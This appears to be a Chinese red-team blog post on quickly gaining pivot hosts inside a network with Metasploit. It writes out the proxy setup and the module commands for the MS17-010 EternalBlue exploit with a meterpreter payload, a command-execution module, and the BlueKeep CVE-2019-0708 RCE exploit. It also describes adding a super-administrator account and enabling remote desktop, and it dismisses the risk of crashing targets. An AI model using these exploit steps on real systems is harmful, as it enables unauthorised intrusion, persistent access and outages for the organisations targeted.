基于 Metasploit 如何快速在内网拿到其他跳板机

1337163122

​ 基于 Metasploit 如何快速在内网拿到其他跳板机原创 渗透攻击红队 [url=]渗透攻击红队[/url] 前天
收录于话题
#内网渗透5
#红队攻击38
渗透攻击红队
一个专注于红队攻击的公众号
​


大家好，这里是 渗透攻击红队的第 59 篇文章，本公众号会记录一些红队攻击的案例，不定时更新

对于 Metasploit 各方面的使用我之前也发过文章，大家去翻我公众号之前的文章就能找到；本篇主要讲基于 Metasploit 如何快速在内网拿到其他跳板机，虽然很粗暴但百试不爽。

基于 Msf 如何快速拿到内网其他跳板机器
前言

针对于使用 MSF 对内网进行扫描，常见的就是使用 proxychains（socks5）
+ msfconsole 就能直接对内网进行扫描， 但其实 proxychains 还是有很多问题的，不太稳定... 为了延缓这一缺点，MSF 有一个参数可以弥补这一缺点：

       
• 
  

1. msf6 > setg Proxies socks5:你的socksIP:端口

复制代码

MSF 只需要设置这一条参数就可以接入 Socks5 隧道！
之后为了梳理扫描到的漏洞资产或者其他，我们需要把 MSF 连接到数据库：

       
• 
         
• 
  

1. <pre><code>msf6 > db_connect postgres:hacker@127.0.0.1/msfdb</code></pre><pre><code>Connected to Postgres data service: 127.0.0.1/msfdb</code></pre>

复制代码

​
设置好之后，以后通过 MSF 扫描到的资产或者漏洞都可以保存到数据库，方便我们梳理，我常用的就是这两个语句：

       
• 
  

1. msf6 > services      查看扫描到的资产IP及端口

复制代码

​

1. msf6 > vulns      查看扫描到的漏洞资产

复制代码

​

MS17-010（永恒之蓝）

在内网渗透过程中如果想要快速拿到一台跳板机器，首选 MS17-010 来打，当然还需要针对与不同的操作系统位数来选择不同的利用模块打；如果目标操作系统是 Win7x64、2008x64 的，可以直接使用正向代理 exploit 利用模块打过去：

1. <pre><code>msf6> use exploit/windows/smb/ms17_010_eternalblue</code></pre><pre><code>msf6> set payload windows/x64/meterpreter/bind_tcp</code></pre><pre><code>msf6> run</code></pre>

复制代码

​
要是目标系统是 2003x32、Win7x32 的只能使用这个模块去执行命令：

1. <pre><code>msf6> use auxiliary/admin/smb/ms17_010_command</code></pre><pre><code>msf6> set command whoami</code></pre><pre><code>msf6> run</code></pre>

复制代码

​
思路就是添加一个超级管理员权限的用户，开启它远程桌面服务：
​


CVE-2019-0708-远程代码执行

除了永恒之蓝还有 0708 可以快速获取到目标主机权限（前提目标开启了 3389，未打补丁），实际情况下很多单位都只打了永恒之蓝的补丁，对于 0708 的补丁还没打，所以很多情况下还是可以利用的！针对于0708 可以使用这个模块打：

1. <pre><code>msf6> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce</code></pre><pre><code>msf6> run</code></pre>

复制代码

​

结尾

以上关于 MS17-010、CVE-2019-0708 这两个漏洞虽然能够快速获取到内网主机权限，相对于其他漏洞来说还是动静太大，永恒之蓝还好，0708 一般来说要打很多次，其中目标主机还会关机蓝屏，所以如果 xdm 不考虑后果的情况下是可以使用这两个漏洞快速去横向渗透，如果害怕动静大的话，这两个漏洞只能是缓兵之计，没有办法了再去用！
​